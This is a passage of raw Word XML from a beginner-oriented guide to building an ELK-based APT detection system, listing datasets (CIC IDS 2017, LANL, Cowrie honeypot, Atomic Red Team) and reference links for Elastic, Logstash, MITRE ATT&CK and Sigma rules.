          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LANL authentication logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> for real-world detection rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F08B9F" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve">Generate synthetic attacks using </w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Atomic Red Team</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E294566" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve">Enrich logs using </w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AlienVault OTX</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AbuseIPDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00381682">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405856F6" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve">Visualize in </w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> and tag using </w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:t xml:space="preserve"> IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180CED6B" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:r w:rsidRPr="00381682">
        <w:pict w14:anchorId="361E257A">
          <v:rect id="_x0000_i1299" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FCD160" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00381682">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary — Top Picks for Beginners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618"/>
        <w:gridCol w:w="4582"/>
      </w:tblGrid>
      <w:tr w:rsidR="00381682" w:rsidRPr="00381682" w14:paraId="5AE8B4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92FDB" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0038168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ADD88D" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00381682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01595399" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00381682">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Best Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381682" w:rsidRPr="00381682" w14:paraId="32DABF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CFA5C" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🌐</w:t>
            </w:r>
            <w:r w:rsidRPr="00381682">
              <w:t xml:space="preserve"> Network Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BCD7136" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t>CIC IDS 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="437D23FF" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t>For Suricata/Zeek-based analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381682" w:rsidRPr="00381682" w14:paraId="7B9863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CF2F6" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>🧩</w:t>
            </w:r>
            <w:r w:rsidRPr="00381682">
              <w:t xml:space="preserve"> Auth Logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79319178" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t>LANL Dataset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DA69B15" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t>For SSH/brute-force &amp; lateral movement detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381682" w:rsidRPr="00381682" w14:paraId="4BBCF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BFF22" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🧠</w:t>
            </w:r>
            <w:r w:rsidRPr="00381682">
              <w:t xml:space="preserve"> Simulated APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52E7726C" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t>Atomic Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="141D867C" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t xml:space="preserve">For generating </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00381682">
              <w:t>labeled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00381682">
              <w:t xml:space="preserve"> attack logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381682" w:rsidRPr="00381682" w14:paraId="668122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30F7A" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚙️</w:t>
            </w:r>
            <w:r w:rsidRPr="00381682">
              <w:t xml:space="preserve"> Real Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F85777D" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t>Cowrie Honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E45CAC7" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t>For malicious command &amp; payload logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381682" w:rsidRPr="00381682" w14:paraId="3F43C3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01D1C" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>📊</w:t>
            </w:r>
            <w:r w:rsidRPr="00381682">
              <w:t xml:space="preserve"> Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C396E0D" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t>MITRE + Sigma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="623FA903" w14:textId="77777777" w:rsidR="00381682" w:rsidRPr="00381682" w:rsidRDefault="00381682" w:rsidP="00381682">
            <w:r w:rsidRPr="00381682">
              <w:t>For creating and mapping detection rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D341542" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📚</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MASTER REFERENCE LIST – ELK-Based APT Detection System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122069AF" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="2BCD1ABF">
          <v:rect id="_x0000_i1385" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="008316D9" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1️</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Core ELK Stack &amp; Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010461E" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Elastic Stack Documentation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03" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elastic-stack/current/index.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004816BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Main reference for Elasticsearch, Logstash, Kibana, Beats setup &amp; APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5ECB16" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Elastic Stack Docker Setup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04" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elastic-stack-get-started/current/get-started-docker.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EA1D64C" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Elastic Cloud (hosted Elasticsearch &amp; Kibana)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05" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/cloud/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71A6EA23" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve">Elastic Cloud </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>Quickstart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve"> Guide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06" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/cloud/current/ec-getting-started.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B713A53" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Beats Reference (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>Metricbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>Packetbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>)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07" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/libbeat/current/beats-reference.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31D75480" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="7687E2FB">
          <v:rect id="_x0000_i1386" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD17DE1" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2️</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Logstash, Pipelines &amp; Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD6F03C" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Logstash Filter Plugins Reference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08" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/logstash/current/filter-plugins.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FCB2348" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve">Logstash </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>ThreatIntel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve"> Filter Configs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09" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/logstash/current/plugins-filters-geoip.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F157A2B" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Logstash Security (TLS, Authentication)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10" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/security-settings.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65FC8495" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:r w:rsidRPr="004816BF">
        <w:pict w14:anchorId="561BAFF8">
          <v:rect id="_x0000_i1387" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2377347A" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3️</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="004816BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK &amp; Detection Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24F8D3" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>MITRE ATT&amp;CK Knowledge Base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11" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="386A7B96" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:lastRenderedPageBreak/>
        <w:t>MITRE ATT&amp;CK RSS Feed (updates)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https://attack.mitre.org/resources/rss/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68140786" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>SigmaHQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve"> Generic Detection Rules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12" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/SigmaHQ/sigma</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63719E4F" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004816BF">
        <w:t>Sigmac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004816BF">
        <w:t xml:space="preserve"> Rule Conversion Tool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13" w:anchor="sigmac" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/SigmaHQ/sigma/wiki/Tools#sigmac</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18D3157E" w14:textId="77777777" w:rsidR="004816BF" w:rsidRPr="004816BF" w:rsidRDefault="004816BF" w:rsidP="004816BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004816BF">
        <w:t>Elastic Detection Rules Repository (MITRE-mapped)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14" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="004816BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/elastic/detection-rules</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
